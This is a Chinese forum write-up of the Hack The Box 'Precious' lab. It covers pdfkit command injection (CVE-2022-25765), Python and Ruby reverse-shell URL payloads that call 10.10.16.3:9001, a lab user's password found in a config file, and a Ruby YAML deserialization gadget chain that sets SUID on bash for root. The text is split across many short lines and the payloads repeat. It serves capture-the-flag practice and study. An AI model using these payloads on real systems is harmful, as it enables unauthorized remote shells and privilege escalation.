-
-
[原创]HTB Precious (easy)
-
发表于: 2022-12-12 11:57 1001
-
参考链接 :https://read.infos3c.net/hack-the-box-htb-writeup-precious
https://meowmeowattack.github.io/htb/precious/
只开着22和80
sudo vim etc/hosts 将precious.htb 写入后访问
网站提供将网页转换为PDF文件的服务,本地开个 服务器试一下
使用工具Exiftool检查文件的元数据
该文件是由PDF文档生成库pdfkitv0.8.6生成的。通过谷歌搜索,可以找到CVE-2022–25765
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
像是一个命令执行
使用shell模板制作一个shell
https://www.revshells.com/
https://github.com/Atsukoro1/PDFKitExploit/blob/master/exploit.sh
这是一个ruby的洞,python的打不了
没有权限访问flag
在ruby用户下发现.bundle中有config文件,在其中找到了henry的密码
"henry:Q3c1AqGHtoI0aXAYFH"
使用密码ssh链接靶机
使用 sudo -l 查看此用户运行什么,henry可以以root身份运行文件 update_depencies.rb
查看代码,发现它使用了易受到反序列化攻击的YAML.load
可参考:
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
示例代码
https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
http:
/
/
10.10
.
16.3
:
80
/
?name
=
`python3
-
c
'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("10.10.16.3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
`
http:
/
/
10.10
.
16.3
:
80
/
?name
=
`python3
-
c
'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("10.10.16.3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
`
http:
/
/
10.10
.
16.3
/
?name
=
%
20
`ruby
-
rsocket
-
e
'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.16.3",9001))'
`
http:
/
/
10.10
.
16.3
/
?name
=
%
20
`ruby
-
rsocket
-
e
'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.16.3",9001))'
`
-
-
-
-
!ruby
/
object
:Gem::Installer
i: x
-
!ruby
/
object
:Gem::SpecFetcher
i: y
-
!ruby
/
object
:Gem::Requirement
requirements:
!ruby
/
object
:Gem::Package::TarReader
io: &
1
!ruby
/
object
:Net::BufferedIO
io: &
1
!ruby
/
object
:Gem::Package::TarReader::Entry
read:
0
header:
"abc"
debug_output: &
1
!ruby
/
object
:Net::WriteAdapter
socket: &
1
!ruby
/
object
:Gem::RequestSet
sets: !ruby
/
object
:Net::WriteAdapter
socket: !ruby
/
module
'Kernel'
method_id: :system
git_set: chmod
+
s
/
usr
/
bin
/
bash
method_id: :resolve
-
-
-
-
!ruby
/
object
:Gem::Installer
i: x
-
!ruby
/
object
:Gem::SpecFetcher
i: y
-
!ruby
/
object
:Gem::Requirement
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)